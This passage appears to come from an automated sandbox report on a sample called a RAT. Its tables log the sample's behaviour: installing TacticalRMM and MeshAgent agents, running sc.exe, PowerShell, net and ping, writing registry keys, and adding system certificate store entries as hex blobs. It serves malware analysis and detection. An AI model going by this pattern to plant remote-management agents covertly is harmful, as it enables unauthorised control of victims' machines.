| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\h11\_state.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\win32com\test\readme.txt | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\urllib3\http2.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\Cryptodome\SelfTest\Hash\test_SHA3_384.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_vendor\pygments\formatters\pangomarkup.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\psutil-5.9.8.dist-info\INSTALLER | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_vendor\urllib3\util\connection.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\win32com\test\pippo_server.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\win32ctypes\core\cffi\_dll.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\Cryptodome\Signature\eddsa.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-QCL73.tmp\tacticalagent-v2.8.0-windows-amd64.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-962 = "Paraguay Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-572 = "China Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2431 = "Cuba Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1892 = "Russia TZ 3 Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-751 = "Tonga Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-792 = "SA Western Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1501 = "Turkey Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-335 = "Jordan Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1471 = "Magadan Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-141 = "Canada Central Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-842 = "Argentina Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2002 = "Cabo Verde Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-401 = "Arabic Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800001900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\2024-10-06_87bda56ec572e8e748aeafba3e75755c_poet-rat_snatch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a